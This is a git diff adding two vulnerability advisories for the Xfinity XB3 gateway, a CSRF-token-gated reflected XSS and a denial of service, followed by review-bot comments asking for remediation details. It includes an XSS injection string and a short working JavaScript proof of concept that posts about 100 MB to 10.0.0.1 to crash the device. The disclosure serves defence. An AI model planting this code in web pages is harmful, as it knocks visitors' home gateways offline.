diff --git a/xfinity/xb3-authenticated-reflected-xss/README.md b/xfinity/xb3-authenticated-reflected-xss/README.md new file mode 100644 index 0000000..1e38280 --- /dev/null +++ b/xfinity/xb3-authenticated-reflected-xss/README.md @@ -0,0 +1,17 @@ +# Xfinity Gateway XB3 - Authenticated Reflected XSS +The administrative interface of Xfinity Gateway model XB3 (and possibly others) will execute arbitrary JavaScript if sent a specially crafted POST request by an a logged in administrator. + +## Details +The `/wizard_step2.php` page takes a POST parameter `userPassword` and unsafely echoes it to JavaScript on the page: + + var newPassword = ''; + +Arbitrary JavaScript can be executed if the following payload is sent in the `userPassword` POST parameter: + + ';}alert(1);function foo() {var foo = ' + +## Mitigating Factors +Users can be logged into the XB3 gateway by any website if the device is using default credentials. However, the POST request exploiting this vulnerability requires a valid CSRF protection token, so this vulnerability is not exploitable by malicious websites without an accompanying CSRF protection token leak. + +## Impact +5.3 - Medium (CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:U/C:L/I:H/A:L) diff --git a/xfinity/xb3-dos-via-large-post-request/README.md b/xfinity/xb3-dos-via-large-post-request/README.md new file mode 100644 index 0000000..74c1b42 --- /dev/null +++ b/xfinity/xb3-dos-via-large-post-request/README.md 
@@ -0,0 +1,17 @@ +# Xfinity Gateway XB3 - DoS Via Large POST Request +The administrative interface of Xfinity Gateway model XB3 (and possibly others) does not enforce a max POST request size. Any website is able to send a large POST request to the gateway at `10.0.0.1`. If the request size is large enough, the device will stop responding and reboot, leading to a Denial of Service condition due to memory exhaustion. + +## Proof of Concept +The following JavaScript will crash an XB3 gateway if a website visitor stays on the page long enough: + + (() => { + const xhr = new XMLHttpRequest(); + xhr.open('POST', 'http://10.0.0.1'); + xhr.send('A'.repeat(99999999)); + })(); + +## Mitigating Factors +During testing it took an average of 80 seconds to post enough data to cause this crash, so a website exploiting this bug would need to convince the user to wait around long enough to finish posting the payload. + +## Impact +6.5 - Medium (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H)
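Review bot: Typo in the first paragraph of xfinity/xb3-authenticated-reflected-xss/README.md: "by an a logged in administrator" should read "by a logged-in administrator". The Details section also stops short of showing the sink: the snippet `var newPassword = '';` only shows the empty default, so state explicitly that the `userPassword` POST value is inserted unescaped inside that single-quoted JavaScript string literal, and add a short Remediation section recommending that the server encode the value for a JavaScript-string context (or stop reflecting a submitted password into page script at all). Recording the firmware version tested would also let readers check the "and possibly others" claim.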
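Review bot: The DoS README in xfinity/xb3-dos-via-large-post-request/README.md records the PoC but not the observed threshold: "If the request size is large enough" should give the smallest body size that reproduced the crash (the PoC sends roughly 100 MB, `'A'.repeat(99999999)`) and the firmware version tested, otherwise the "and possibly others" claim and the 80-second figure under Mitigating Factors cannot be re-checked. Add a Remediation section stating the fix the first paragraph implies: enforce a maximum request body size on the gateway's admin HTTP server and reject oversized POSTs early (e.g. with 413) instead of buffering them into memory. Minor: the CVSS vector gives A:H, consistent with the reboot described, but the text should say whether the device recovers on its own after rebooting or needs manual intervention, since that affects the impact write-up.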